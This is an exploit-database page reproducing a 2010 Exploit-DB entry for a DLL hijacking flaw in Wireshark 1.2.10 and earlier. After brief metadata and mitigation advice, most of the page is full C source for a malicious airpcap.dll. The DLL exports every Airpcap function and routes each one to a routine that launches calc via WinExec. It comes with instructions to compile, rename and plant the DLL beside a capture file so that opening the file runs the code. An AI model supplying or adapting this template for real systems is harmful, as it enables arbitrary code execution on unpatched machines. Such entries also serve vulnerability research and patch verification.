Wireshark - exploit.company

vendor:

Wireshark

by:

TheLeader

9,3

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Wireshark

Affected Version From: 1.2.10 and prior

Affected Version To: 1.2.10 and prior

Patch Exists: YES

Related CWE: N/A

CPE: a:wireshark:wireshark

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x86 (6.1.7600)

2010

Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)

This exploit allows an attacker to execute arbitrary code on a vulnerable system by hijacking a DLL file associated with Wireshark. The attacker can create a malicious DLL file with the same name as the legitimate DLL file and place it in the same directory as the vulnerable application. When the vulnerable application is executed, the malicious DLL file will be loaded and executed instead of the legitimate DLL file.

Mitigation:

Ensure that all applications are up to date and that all DLL files are legitimate and from a trusted source.

Source

Exploit-DB raw data:

/*
Exploit Title: Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Software Link: http://www.wireshark.org/download.html
Version: 1.2.10 and prior
Tested on: Windows 7 x86 (6.1.7600)

As seen on Metasploit blog (rock on HDM!): 
http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

Probably gonna see alot of these bugs getting exploited in the near future..

Compile and rename to airpcap.dll, create a file in the same dir with one of the following extensions.

Default Wireshark file extension associations:
.5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng /
.pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz

Double click & watch a nice calculator pop =]
Shouts to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void AirpcapGetDeviceList() { evil(); }
DLLIMPORT void AirpcapFreeDeviceList() { evil(); }
DLLIMPORT void AirpcapOpen() { evil(); }
DLLIMPORT void AirpcapClose() { evil(); }
DLLIMPORT void AirpcapGetLinkType() { evil(); }
DLLIMPORT void AirpcapSetLinkType() { evil(); }
DLLIMPORT void AirpcapSetKernelBuffer() { evil(); }
DLLIMPORT void AirpcapSetFilter() { evil(); }
DLLIMPORT void AirpcapGetMacAddress() { evil(); }
DLLIMPORT void AirpcapSetMinToCopy() { evil(); }
DLLIMPORT void AirpcapGetReadEvent() { evil(); }
DLLIMPORT void AirpcapRead() { evil(); }
DLLIMPORT void AirpcapGetStats() { evil(); }
DLLIMPORT void AirpcapTurnLedOn() { evil(); }
DLLIMPORT void AirpcapTurnLedOff() { evil(); }
DLLIMPORT void AirpcapGetDeviceChannel() { evil(); }
DLLIMPORT void AirpcapSetDeviceChannel() { evil(); }
DLLIMPORT void AirpcapGetFcsPresence() { evil(); }
DLLIMPORT void AirpcapSetFcsPresence() { evil(); }
DLLIMPORT void AirpcapGetFcsValidation() { evil(); }
DLLIMPORT void AirpcapSetFcsValidation() { evil(); }
DLLIMPORT void AirpcapGetDeviceKeys() { evil(); }
DLLIMPORT void AirpcapSetDeviceKeys() { evil(); }
DLLIMPORT void AirpcapGetDecryptionState() { evil(); }
DLLIMPORT void AirpcapSetDecryptionState() { evil(); }
DLLIMPORT void AirpcapStoreCurConfigAsAdapterDefault() { evil(); }
DLLIMPORT void AirpcapGetVersion() { evil(); }
DLLIMPORT void AirpcapGetDriverDecryptionState() { evil(); }
DLLIMPORT void AirpcapSetDriverDecryptionState() { evil(); }
DLLIMPORT void AirpcapGetDriverKeys() { evil(); }
DLLIMPORT void AirpcapSetDriverKeys() { evil(); }
DLLIMPORT void AirpcapSetDeviceChannelEx() { evil(); }
DLLIMPORT void AirpcapGetDeviceChannelEx() { evil(); }
DLLIMPORT void AirpcapGetDeviceSupportedChannels() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}